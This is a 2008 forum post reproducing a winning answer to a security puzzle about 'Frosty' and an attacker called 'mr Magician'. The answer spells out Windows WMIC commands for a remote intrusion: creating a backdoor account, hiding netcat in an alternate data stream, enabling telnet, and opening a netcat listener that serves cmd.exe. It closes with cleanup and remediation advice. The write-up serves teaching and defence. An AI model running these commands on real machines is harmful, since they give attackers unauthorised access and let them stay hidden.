Post Wed Apr 02, 2008 12:31 pm

Skillz Dec 07 Winning Entry - Technical

Icetek


Melting? Not so fun..
A lesson Frost has learnt well
Secure is cool, yeah!!

Author: icetek  ~  circa 2008


## QUESTION 1 ##

# Frostinator’s temp check script – great idea, however, I found issues with it at two levels. First, when tested on my XP boxes I received the “Not Supported” response. This was likely due to the hardware I was testing on though. Secondly, and more importantly, for the boxes I did get it to work on the WMI interface will not update the temperature while it was running. The temp will display every 15 seconds, but, never refreshes until the system is rebooted. A utility that uses kernel mode drivers would have helped Frosty to get a constantly refreshing display. I found this out the hard way by testing on one of my systems when the temperature never deviated from 3132 kelvin - even though it was heating up all of the time.

C:\> wmic /namespace:\\root\wmi PATH MSAcpi_ThermalZoneTemperature get CurrentTemperature /every:15

## QUESTION 2 ##

# mr Magician's load check script. This script which is available on the evil magician's XP box is used to read information about the chosen computer (Frosty's). In this case, mr Magician is remotely obtaining the load percentage to find out when Frosty's load starts jumping. This does update properly!

C:\> wmic /node:icebox /user:administrator /password:happybirthday cpu get loadpercentage /every:15

# Now mr Magician is adding his own user "merry" with a password of "christmas" which he will login with later.

C:\> wmic /node:icebox /user:administrator /password:happybirthday process call create "cmd.exe /c net user merry christmas /add"

# mr Magician giving merry privileges on icebox's c$ share

C:\> net use * \\icebox\c$ christmas /u:merry

# Ingeniously we're utilizing Alternate Data Streams (ADS) to hide netcat on the remote system within another file. This will not change the target file size and may or may not alter the file date.

C:\> type c:\nc.exe > z:\windows\system32\wbem\wmic.exe:windows.exe

# Now we enable the telnet server on the remote system and make it start automatically from now on.

C:\> wmic /node:icebox /user:administrator /password:happybirthday service where name="TlntSvr" call changestartmode "automatic"

# Now he starts the telnet service

C:\> wmic /node:icebox /user:administrator /password:happybirthday service where name="TlntSvr" call startservice

# Time to log evil merry in..

C:\> telnet icebox
Login: merry
Password: *********

# Ok, now we've started the hidden netcat binary without dns resolution, using UDP, listening on port 2222 to execute a command prompt on connection.

C:\Documents and Settings\merry> wmic process call create "c:\windows\system32\wbem\wmic:exe:windows.exe -n -u -l -p 2222 -e cmd.exe"

# Enter the melting command in a cryptic manner

C:\> nc -u icebox 2222

<long maniacal screed>

# Since the command interpreter only grabs the first character at the beginning of each line and interprets spaces at the beginning of lines, the command ends up looking something like this:

FOR /L %I IN (1,0,2) DO @ECHO MELT

And Frosty begins his long, hot, painful melt of looping echoes... :-(

## QUESTION 3 ##

As far as getting back down to comfort levels quickly, probably the quickest way to expel mr Magician is to disconnect his system from the internet initially to prevent mr Magician from telnetting back in to do further damage.

Next, Frost needs to quickly kill the shell that is doing the @ECHO command. Rebooting the box or killing the cmd.exe process *if the box is responsive* should work.

On boot-up or after killing cmd.exe he needs to go into the services and disable the telnet server service and set it to not start automatically.

The streamed file can be "unstreamed" by copying it back to *itself* "copy c:\windows\system32\wbem\wmic.exe:windows.exe c:\nc.exe".  He might want to remove netcat as well. A good virus scan / root kit remover and firewall would have probably helped in detecting and possibly preventing the streamed file.

Finally, and *MOST* importantly, he needs to remove the "merry" user and update all of his passwords to passphrases with high complexity so that he'll never lose his cool again!

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~icetek



Posted by Don
CISSP, MCSE, CSTA, Security+ SME